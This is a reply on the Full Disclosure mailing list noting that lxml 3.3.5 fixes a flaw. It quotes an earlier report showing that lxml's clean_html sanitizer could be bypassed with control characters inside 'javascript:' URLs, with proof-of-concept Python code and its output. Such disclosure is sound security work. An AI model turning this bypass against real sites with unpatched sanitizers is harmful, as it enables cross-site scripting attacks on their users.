FYI -- this seems to be patched with 3.3.5. [0] Cheers, Z.
References: [0] http://lxml.de/3.3/changes-3.3.5.html 2014-04-15 20:30 GMT+02:00 Максим Кочкин <maxxa...@gmail.com>: > Hi, all > > I've accidentally found vulnerability in clean_html function of lxml python > library. User can break schema of url with nonprinted chars (\x01-\x08). > Seems like all versions including the latest 3.3.4 are vulnerable. Here is > PoC. > > > from lxml.html.clean import clean_html > > html = '''\ > <html> > <body> > <a href="javascript:alert(0)"> > aaa</a> > <a href="javas\x01cript:alert(1)">bbb</a> > <a href="javas\x02cript:alert(1)">bbb</a> > <a href="javas\x03cript:alert(1)">bbb</a> > <a href="javas\x04cript:alert(1)">bbb</a> > <a href="javas\x05cript:alert(1)">bbb</a> > <a href="javas\x06cript:alert(1)">bbb</a> > <a href="javas\x07cript:alert(1)">bbb</a> > <a href="javas\x08cript:alert(1)">bbb</a> > <a href="javas\x09cript:alert(1)">bbb</a> > </body> > </html>''' > > print clean_html(html) > > > Output: > > <div> > <body> > <a href="">aaa</a> > <a href="javascript:alert(1)"> > bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="javascript:alert(1)">bbb</a> > <a href="">bbb</a> > </body> > </div> > > > I've emailed lxml-guys. Hope they'll fix it soon. > > ---- > ksimka (@m_ksimka) > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/